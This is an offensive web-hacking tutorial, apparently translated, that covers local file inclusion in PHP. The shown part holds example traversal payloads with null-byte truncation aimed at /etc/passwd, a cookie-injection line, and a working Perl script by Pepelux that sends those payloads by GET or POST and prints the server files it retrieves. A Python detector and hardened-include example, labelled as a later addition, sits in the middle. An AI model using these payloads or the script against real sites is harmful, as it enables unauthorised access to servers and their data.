| = ---------- [Web vulnerabilities as a way to obtain system privileges] -------------- = |
-- [Directory
1-Introduction
2-Local and remote file inclusion (LFI/RFI)
2.1-Introduction
2.2-Remote command execution
2.2.1-Inject PHP code into the Apache logs
2.2.2-Insert PHP code into a database table
2.2.3-Inject PHP code into an image
2.2.4-Inject PHP code into the session file
2.2.5-Inject PHP code into other files
2.3-Get a webshell
2.4-Remote file inclusion
3-Blind injection
3.1-Introduction
3.2-Load local files
3.3-Brute-force data acquisition
3.4-Remote command execution
3.5-Get a webshell
4-References
--------------------------------------------------------------------------------------------------------
--- [1-Introduction
In the United States, many websites are vulnerable to attack. Most of them run code that has been in use for a long time and carries many vulnerabilities. LFI, RFI, SQL injection, XSS, SSI, ICH and other attack methods can be used to break into them. This article shows how those vulnerabilities are used against such websites to obtain SYSTEM privileges and execute commands remotely.
This will be a rather dull article about a few vulnerability types, mostly as a reminder; I will try to contribute something new and write down the basic concepts behind each vulnerability.
--- [2-Local and remote file inclusion (LFI/RFI)
---- [2.1-Introduction
This type of attack is well known. It is basically caused by using require, require_once, include or include_once to load another file while the variable that names the file is not initialized, so its value comes straight from the request. Examples:
  require($file);
  require("regiondes/".$file);
  require("ages/".$lang.".php");
  require("themes/".$tema."/config.php");
Exploitation of this vulnerability is well known, so I will not explain it in detail; I just want to give a few examples:
Include type:
  require($file);
Usage:
  http://host/?file=/etc/passwd

Include type:
  require("regiondes/".$file);
Usage:
  http://host/?file=../../../etc/passwd

Include type:
  require("ages/".$lang.".php");
  require("themes/".$tema."/config.php");
Usage:
  http://host/?file=../../../etc/passwd%00

Include type:
  require("ages/".$_COOKIE['lang'].".php");
Usage:
  javascript:document.cookie="lang=../../../etc/passwd%00";
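The checks a defender would put in front of these include statements, as an added example that is not part of the original article or Pepelux's code: lfi_indicators() flags the payload shapes shown above (absolute path, traversal, %00 truncation, remote URL) so it can be used for input validation or log review, and safe_include_path() resolves an allow-listed value under a fixed directory instead of concatenating the raw variable. BASE_DIR, ALLOWED and the function names are assumptions.

```python
import os
import urllib.parse

BASE_DIR = "/var/www/app/languages"   # assumption: the application's include root
ALLOWED = {"en", "es", "de"}           # assumption: the only legitimate $lang values


def lfi_indicators(raw_value):
    """Reasons a raw (still URL-encoded) query or cookie value looks like a
    file-inclusion attempt; each check mirrors one payload shape from the text."""
    value = urllib.parse.unquote(raw_value)
    reasons = []
    if "\x00" in value:                                    # ...etc/passwd%00
        reasons.append("null byte")
    if ".." in value.replace("\\", "/").split("/"):        # ../../etc/passwd
        reasons.append("traversal")
    if value.startswith("/"):                              # /etc/passwd
        reasons.append("absolute path")
    if value.lower().startswith(("http://", "https://", "ftp://")):
        reasons.append("remote url")                       # the RFI variant
    return reasons


def safe_include_path(raw_value, base_dir=BASE_DIR):
    """Hardened replacement for require("ages/".$lang.".php"): allow-list the
    value first, then confirm the resolved path is still inside base_dir.
    Returns the absolute path to include, or None when the request is rejected."""
    if lfi_indicators(raw_value):
        return None
    value = urllib.parse.unquote(raw_value)
    if value not in ALLOWED:
        return None
    root = os.path.realpath(base_dir)
    real = os.path.realpath(os.path.join(root, value + ".php"))
    # defence in depth: even an allow-listed name must not escape the root
    if os.path.commonpath([root, real]) != root:
        return None
    return real


if __name__ == "__main__":
    # constructed sample values: the payloads shown above plus one legitimate value
    for sample in ["/etc/passwd", "../../../etc/passwd",
                   "../../../etc/passwd%00", "en"]:
        print(f"{sample!r:32} indicators={lfi_indicators(sample)}"
              f" include={safe_include_path(sample)}")
```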
The following Perl script exploits this vulnerability type through either GET or POST requests.
lfi.pl
#!/usr/bin/perl
# Perl script to exploit LFI based on GET and POST requests
# Example: http://site.com/index.php?var=
# URL: http://site.com/index.php
# Variable: var
# Method: POST
#
# By Pepelux (pepelux [at] enye-sec [dot] org)

use LWP::UserAgent;
use HTTP::Request;

$ua = LWP::UserAgent->new;
my ($host, $var, $method) = @ARGV;

unless ($ARGV[2]) {
    print "Usage: perl $0 <url> <vulnerable_var> <method>\n";
    print "\tex: perl $0 http://site.com/index.php var GET\n";
    print "\tex: perl $0 http://site.com/index.php var POST\n";
    exit 1;
}

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1)");
$ua->timeout(10);
$host = "http://".$host if ($host !~ /^http:/);

# loop forever, asking for one file name per iteration
while () {
    print "file to edit: ";
    chomp($file = <STDIN>);
    if ($method =~ /GET/) {
        # traversal prefix and %00 terminator appended to the user-supplied name
        $url = $host."?".$var."=../../../".$file."%00";
        $req = HTTP::Request->new(GET => $url);
        $req->header('Accept' => 'text/html');
    }
    else {
        $req = HTTP::Request->new(POST => $host);
        $req->content_type('application/x-www-form-urlencoded');
        $req->content($var."=../../../".$file."%00");
    }
    $res = $ua->request($req);
    if ($res->is_success) {
        $result = $res->content;
        print $result;
    }
    else { print "Error\n"; }
}